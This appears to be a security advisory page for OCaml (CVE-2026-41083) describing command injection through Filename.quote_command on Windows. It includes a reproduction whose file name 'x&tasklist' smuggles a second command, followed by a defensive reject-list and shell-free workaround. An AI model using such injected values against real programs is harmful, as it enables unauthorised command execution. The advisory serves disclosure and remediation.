OSEC-2026-05

Import Source
https://github.com/ocaml/security-advisories/blob/generated-osv/2026/OSEC-2026-05.json
JSON Data
https://api.osv.dev/v1/vulns/OSEC-2026-05
Aliases
  • CVE-2026-41083
Published
2026-06-18T13:45:00Z
Modified
2026-06-18T14:26:26.886874Z
Severity
  • 6.1 (Medium) CVSS_V3 - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N
Summary
Windows command execution via filename quotes.
Details

The quoting of the stdin/stdout/stderr file names (using Filename.quote_command) on Windows is not sufficient: it allows the & character to be passed through. An attacker who can specify the stdin/stdout/stderr of a program to be executed can therefore inject a shell command.

Exploit

$ opam exec -- ocaml
OCaml version 4.14.2
Enter #help;; for help.

# let outfile = "x&tasklist" in
  let cmd = Filename.quote_command "netsh.exe" ~stdout:outfile ["help"] in
  ignore (Sys.command cmd)
  ;;

Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
System Idle Process              0 Services                   0          8 K
System                           4 Services                   0        168 K
Secure System                  236 Services                   0    191,468 K
Registry                       276 Services                   0      3,428 K
smss.exe                       608 Services                   0      1,676 K
csrss.exe                      984 Services                   0      5,928 K
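
For code that cannot yet move to a fixed release (4.14.4 or 5.5.0), the following added example, which is not part of the advisory or of the OCaml sources, shows two ways to keep an untrusted redirection file name away from cmd.exe: rejecting it before calling Filename.quote_command, or opening the file directly and starting the program without a shell. The names checked_quote_command and run_with_stdout_file and the rejected-character set are assumptions of this example.

```ocaml
(* Added example, not code from the OCaml distribution.
   Needs the unix library (e.g. `ocamlfind ocamlopt -package unix`). *)

(* Conservative reject list chosen for this example (assumption): characters
   cmd.exe treats as operators, escapes or expansion markers. The advisory
   itself names only '&'. *)
let cmd_metachars = "&|<>^%!\"\r\n"

let has_cmd_metachar s =
  let rec go i =
    i < String.length s && (String.contains cmd_metachars s.[i] || go (i + 1))
  in
  go 0

(* Hypothetical wrapper: refuse suspicious redirection targets, then defer to
   Filename.quote_command for everything else. *)
let checked_quote_command prog ?stdin ?stdout ?stderr args =
  let check label = function
    | Some f when has_cmd_metachar f ->
        invalid_arg (Printf.sprintf "%s target rejected: %S" label f)
    | _ -> ()
  in
  check "stdin" stdin;
  check "stdout" stdout;
  check "stderr" stderr;
  Filename.quote_command prog ?stdin ?stdout ?stderr args

(* Shell-free alternative: open the output file ourselves and hand the
   descriptor to the child, so the file name never reaches cmd.exe. *)
let run_with_stdout_file prog args outfile =
  let fd =
    Unix.openfile outfile [ Unix.O_WRONLY; Unix.O_CREAT; Unix.O_TRUNC ] 0o644
  in
  Fun.protect
    ~finally:(fun () -> Unix.close fd)
    (fun () ->
      let argv = Array.of_list (prog :: args) in
      let pid = Unix.create_process prog argv Unix.stdin fd Unix.stderr in
      snd (Unix.waitpid [] pid))

let () =
  (* The file name from the reproduction above is rejected before any
     command line is built. *)
  match checked_quote_command "netsh.exe" ~stdout:"x&tasklist" [ "help" ] with
  | cmd -> ignore (Sys.command cmd)
  | exception Invalid_argument msg -> prerr_endline msg
```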

Timeline

  • 2026-06-18 release of this security advisory
  • 2026-06-15 release of OCaml 4.14.4
  • 2026-06-08 fix by David Allsopp https://github.com/ocaml/ocaml/pull/14853
  • 2026-04-11 reported by Anil Madhavapeddy, forwarded from Andrew Nesbitt to security@ocaml.org
Database specific
{
    "human_link": "https://github.com/ocaml/security-advisories/tree/main/advisories/2026/OSEC-2026-05.md",
    "cwe": [
        "CWE-78"
    ],
    "osv": "https://github.com/ocaml/security-advisories/tree/generated-osv/2026/OSEC-2026-05.json"
}
Credits
    • Andrew Nesbitt - REPORTER
    • David Allsopp - REMEDIATION_DEVELOPER
    • Florian Angeletti - REMEDIATION_REVIEWER
    • Hannes Mehnert - COORDINATOR

Affected packages

opam / ocaml

Package

Name
ocaml
Purl
pkg:opam/ocaml

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0 Unknown introduced version / All previous versions are affected
Fixed
4.14.4
Type
ECOSYSTEM
Events
Introduced
5
Fixed
5.5.0
Type
GIT
Repo
https://github.com/ocaml/ocaml
Events
Introduced
0 Unknown introduced commit / All previous commits are affected
Fixed

Affected versions

3.*
3.07
3.07+1
3.07+2
3.08.0
3.08.1
3.08.2
3.08.3
3.08.4
3.09.0
3.09.1
3.09.2
3.09.3
3.10.0
3.10.1
3.10.2
3.11.0
3.11.1
3.11.2
3.12.0
3.12.1
4.*
4.00.0
4.00.1
4.01.0
4.02.0
4.02.1
4.02.2
4.02.3
4.02.4
4.03.0
4.03.1
4.04.0
4.04.1
4.04.2
4.04.3
4.05.0
4.05.1
4.06.0
4.06.1
4.06.2
4.07.0
4.07.1
4.07.2
4.08.0
4.08.1
4.08.2
4.09.0
4.09.1
4.09.2
4.10.0
4.10.1
4.10.2
4.10.3
4.11.0
4.11.1
4.11.2
4.11.3
4.12.0
4.12.1
4.12.2
4.13.0
4.13.1
4.13.2
4.14.0
4.14.0-alpha1
4.14.0-alpha2
4.14.0-beta1
4.14.0-rc1
4.14.0-rc2
4.14.1
4.14.1-rc1
4.14.2
4.14.2-rc1
4.14.3
5.*
5.0.0
5.0.1
5.1.0
5.1.1
5.1.2
5.2.0
5.2.1
5.2.2
5.3.0
5.3.1
5.4.0
5.4.1
5.4.2
5.5.0-alpha1
5.5.0-alpha2
5.5.0-alpha3
5.5.0-beta1
Other
flambda_fork_point

Ecosystem specific

{
    "opam_constraint": "ocaml {< \"4.14.4\" | >= \"5\" & < \"5.5.0\"}"
}

Database specific

source
"https://github.com/ocaml/security-advisories/blob/generated-osv/2026/OSEC-2026-05.json"